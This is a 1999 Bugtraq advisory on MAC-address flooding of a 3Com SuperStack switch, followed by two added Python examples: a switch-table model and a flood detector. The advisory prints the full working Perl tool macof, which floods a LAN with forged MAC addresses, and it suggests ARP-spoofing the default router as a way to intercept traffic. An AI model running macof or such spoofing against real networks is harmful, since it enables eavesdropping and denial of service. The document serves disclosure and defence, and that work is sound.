Everhart, Glenn (FUSA)
From: ian.vitek@INFOSEC.SE
Sent: Wednesday, May 05, 1999 4:15 AM
To: BUGTRAQ@NETSPACE.ORG
Subject: Infosec.19990305.macof.a

Infosec Security Vulnerability Report No: Infosec.19990305.macof.a
==================================================================

Vulnerability Summary
---------------------

Problem:  Due to the limited size of their ARP/MAC tables, switches can start
          sending packets to all ports, and other network devices can hang,
          crash or reboot, when they receive a large number of MAC addresses.

Threat:   Someone could eavesdrop on (sniff) network connections over a
          switched network. Denial of service attacks on a local network.

Platform: Verified on a 3Com SuperStack Switch 3300 (3c16981, Hardware v.1,
          Software v.2.10). Very possibly other network devices as well.

Solution: No solution to the problem is known today.

Vulnerability Description
-------------------------

Scenario: Computer A talks with computer B. Computer C is running macof.
Computers A, B and C are connected to the same 3Com switch.

When macof ( http://quake.skif.net/RawIP/macof.html ), a Perl program
included in the Perl module Net::RawIP ( http://quake.skif.net/RawIP/ ), is
run through a 3Com SuperStack Switch 3300 (3c16981, Hardware v.1, Software
v.2.10), the switch starts sending all network packets from computer A to
both computer B and computer C.

Solution
--------

No solution to the problem is known today. As a workaround for switches you
could, where the feature is available, lock a single MAC address to every
port on the switch.

Background
----------

At DefCon VI there were discussions about switches. Some people buy a switch
because you cannot eavesdrop on a network connection over it. Someone said
that if you send a special multicast frame to a switch you can spoof another
switch, and the switch should then start sending network packets to you.

In these attempts we discovered that you can easily spoof a MAC address and
thereby confuse a switch, because the switch tries to remember which MAC
addresses are on each port.
Because some network packets go to the spoofed MAC address, the connections
get problems (retransmissions). But what happens if the switch is flooded
with MAC addresses? The switch only has a bounded amount of memory for the
MAC addresses on each port. What happens when this table gets full?

After a few tests (with macof) we got different results depending on the
brand of the switch. Some switches stopped working, and others started to
forward network traffic to the wrong ports or to all ports. The only
scientific analysis is the one reported here. This is a resource problem.

3Com was informed about this problem on 21/4 1999.

macof is just one way to do it. We think that the best way to eavesdrop on
a connection over a switch is to spoof the default router: send ARP
redirects with your MAC address as the "changing to" address and route the
incoming packets on to the default router's MAC address.

//Ian Vitek
ian.vitek@infosec.se

Test program, macof:
------

#!/usr/bin/perl -w
#
# macof v. 1.1
# By Ian Vitek ( ian.vitek@infosec.se )
# Tests network devices by flooding local network with MAC-addresses.
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./macof -e -n 1000000
#          ./macof -r -n 1000000
#          (run it several times)
#
# Warning: This program could cause serious problems on your network.
#          This program could hang, crash or reboot network devices.
#          Switches could start sending packages to all ports making it
#          possible to intercept network traffic.
#
#

require 'getopts.pl';
use Net::RawIP;

Getopts('hvrs:e:d:x:y:i:n:');

sub GenMAC {
    my $tmp_mac="00";
    my $i=0;

    # generate random mac-address (five more octets, one hex digit at a time)
    while($i++ < 5) {
        $tmp_mac.=":" . sprintf("%x",int rand 16);
        $tmp_mac.=sprintf("%x",int rand 16);
    }
    return($tmp_mac);
}

$a = new Net::RawIP;

die "usage: $0 [options]\
\t-d dest_host\t\t(def:random)\
\t-s source_host\t\t(def:random)\
\t-v \t\t\tprints generated mac-addresses\
\t-r | -e dest_mac \trandomize or set destination mac address\
\t\t\t\tshould be in format ff:ff:ff:ff:ff:ff or host\
\t-x source_port\t\t(def:random)\
\t-y dest_port \t\t(def:random)\
\t-i interface \t\tset sending interface \t\t(def:eth0)\
\t-n times\t\tset number of times to send \t(def:1)\
\t-h this help\n" unless ( !$opt_h && !($opt_r && $opt_e) );

# set default values
$opt_i="eth0" unless $opt_i;
$opt_n=1 unless $opt_n;
$s_host=$opt_s if $opt_s;
$d_host=$opt_d if $opt_d;
$s_port=$opt_x if $opt_x;
$d_port=$opt_y if $opt_y;

# choose network card
if($opt_e) {
    $a->ethnew($opt_i, dest => $opt_e);
} else {
    $a->ethnew($opt_i);
}

# Loop
for($times=0; $times < $opt_n; $times++) {

    # Check if one or two mac-addresses should be generated
    $mac=&GenMAC;
    if($opt_r) {
        $d_mac=&GenMAC;
        print "$d_mac \t$mac\n" if($opt_v);
        # set mac-addresses
        $a->ethset(source => $mac, dest => $d_mac);
    } else {
        print "$mac\n" if($opt_v);
        # set mac-address
        $a->ethset(source => $mac);
    }

    # generate random source and destination ip-addresses
    $s_host=17000000+int rand 4261000000 unless $opt_s;
    $d_host=17000000+int rand 4261000000 unless $opt_d;

    # generate random source and dest ports
    $s_port=int rand 65535 unless $opt_x;
    $d_port=int rand 65535 unless $opt_y;

    # set network package
    $a->set({ip => {saddr => $s_host, daddr => $d_host},
             tcp => {source => $s_port, dest => $d_port} });

    # send
    $a->ethsend;
}
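The bounded MAC table that the Background section describes, and the "lock a MAC address to every port" workaround from the Solution section, as an added model that is not part of the post or of macof. A toy switch learns source MACs per ingress port, evicts the oldest entry when its table is full (a constructed stand-in for the vendor-specific "table full" behaviour the post observed), and floods frames to unknown destinations; the same run with a one-MAC-per-port limit keeps the A-B conversation on its own ports. The table size of 8, the port numbers and the MAC addresses are constructed.

```python
"""Toy model of a switch forwarding table under a macof-style flood.

Added example; not code from the post or from macof. All values are
constructed: a table of 8 entries, three ports, made-up MAC addresses.
Real switches hold thousands of entries and age them out on a timer;
evicting the oldest entry when the table is full stands in here for the
vendor-specific 'table full' behaviour the post observed.
"""
import random
from collections import OrderedDict

FLOOD = "flood"   # frame sent out every port except the one it came in on
DROP = "drop"     # frame discarded (filtered, or refused by port security)


class Switch:
    def __init__(self, capacity, max_per_port=None):
        self.capacity = capacity            # total entries the table can hold
        self.max_per_port = max_per_port    # None = no per-port MAC limit
        self.table = OrderedDict()          # mac -> port; insertion order = age
        self.violations = []                # (port, mac) refused by port security

    def _learn(self, mac, port):
        """Record that `mac` was seen on `port`; return False if refused."""
        if mac in self.table:
            self.table.move_to_end(mac)     # refresh the entry's age
            self.table[mac] = port
            return True
        if self.max_per_port is not None:
            on_port = sum(1 for p in self.table.values() if p == port)
            if on_port >= self.max_per_port:
                self.violations.append((port, mac))
                return False
        if len(self.table) >= self.capacity:
            self.table.popitem(last=False)  # table full: evict the oldest entry
        self.table[mac] = port
        return True

    def handle_frame(self, src_mac, dst_mac, in_port):
        """Return the egress port number, FLOOD, or DROP for one frame."""
        if not self._learn(src_mac, in_port):
            return DROP
        out = self.table.get(dst_mac)
        if out is None:
            return FLOOD                    # unknown destination: send everywhere
        if out == in_port:
            return DROP                     # destination sits on the ingress port
        return out


def random_mac(rng):
    # locally administered prefix, so constructed addresses never collide with A or B
    return "02:" + ":".join(f"{rng.randrange(256):02x}" for _ in range(5))


def run_scenario(max_per_port=None, flood_frames=50, seed=1):
    """A (port 1) talks to B (port 2); C (port 3) floods random source MACs.

    Returns (egress for A->B before the flood, egress after it, number of
    frames port security refused).
    """
    sw = Switch(capacity=8, max_per_port=max_per_port)
    A, B = "00:00:00:00:00:0a", "00:00:00:00:00:0b"
    sw.handle_frame(A, B, 1)                # A is learned; B unknown, so flooded
    sw.handle_frame(B, A, 2)                # B is learned
    before = sw.handle_frame(A, B, 1)       # now a plain unicast to port 2
    rng = random.Random(seed)
    for _ in range(flood_frames):
        sw.handle_frame(random_mac(rng), random_mac(rng), 3)
    after = sw.handle_frame(A, B, 1)
    return before, after, len(sw.violations)


if __name__ == "__main__":
    print("no port security:", run_scenario())                # (2, 'flood', 0)
    print("one MAC per port:", run_scenario(max_per_port=1))  # (2, 2, 49)
```

Without a per-port limit the 50 forged sources push A's and B's entries out of the table, and the next A-to-B frame is flooded to every port, including C's, which is exactly what the post saw on the 3300. With the limit set to one address per port, the first forged source on port 3 is learned and every later one is refused, so the table, and the A-B unicast path, survive.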
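Spotting the flood from the defender's side, as an added example that is not part of the post: the Background section notes that the switch only has bounded memory for MAC addresses per port, so a port that suddenly produces hundreds of never-seen source MACs is the signal to look for. The records are constructed here and assumed to come from something that sees frames per switch port (a mirror port, flow export, or a switch's MAC-learning log); the 1999-era 3300 in the post is not assumed to provide any of these, and the threshold and window values are illustrative.

```python
"""Flag a port that learns an abnormal number of new source MACs in a short time.

Added example; not from the post. Input records are constructed and assumed
to come from a mirror port, flow export, or a switch's MAC-learning log;
window and threshold are illustrative values.
"""
import random
from collections import defaultdict, deque


def detect_mac_flood(frames, window, threshold):
    """frames: (t_seconds, port, src_mac) tuples in time order.

    Raise one alert per port the first time more than `threshold` distinct
    source MACs are seen for the first time on that port within the trailing
    `window` seconds. A known host repeating itself never counts.
    """
    first_seen = set()            # (port, mac) pairs already learned
    recent = defaultdict(deque)   # port -> times of recent first sightings
    alerts, alerted = [], set()
    for t, port, mac in frames:
        if (port, mac) in first_seen:
            continue
        first_seen.add((port, mac))
        q = recent[port]
        q.append(t)
        while q and q[0] < t - window:
            q.popleft()           # drop sightings that fell out of the window
        if len(q) > threshold and port not in alerted:
            alerted.add(port)
            alerts.append({"port": port, "time": t, "new_macs_in_window": len(q)})
    return alerts


def sample_frames(seed=7):
    """Constructed traffic: two single hosts, a small hub, and one flooding port."""
    rng = random.Random(seed)
    frames = []
    for i in range(60):           # 30 s of normal traffic, one host per port
        frames.append((i * 0.5, 1, "00:00:00:00:00:0a"))
        frames.append((i * 0.5, 2, "00:00:00:00:00:0b"))
        # five hosts behind a hub on port 4: several MACs, but a fixed small set
        frames.append((i * 0.5, 4, f"00:00:00:00:00:{0x10 + i % 5:02x}"))
    for i in range(200):          # port 3: 200 random sources within one second
        mac = "02:" + ":".join(f"{rng.randrange(256):02x}" for _ in range(5))
        frames.append((10.0 + i / 200, 3, mac))
    frames.sort(key=lambda f: f[0])
    return frames


def run_detection():
    return detect_mac_flood(sample_frames(), window=5.0, threshold=20)


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)  # one alert: port 3 at t=10.1 with 21 new MACs in the window
```

The threshold has to sit above the largest legitimate population behind a single port (a hub, a wireless bridge, a virtualisation host), which is why the five-host hub on port 4 stays quiet while port 3 trips the alert after its twenty-first new address. The same counter is what a port-security feature enforces inline when it is available; the detector is for the switches the post describes, where it is not.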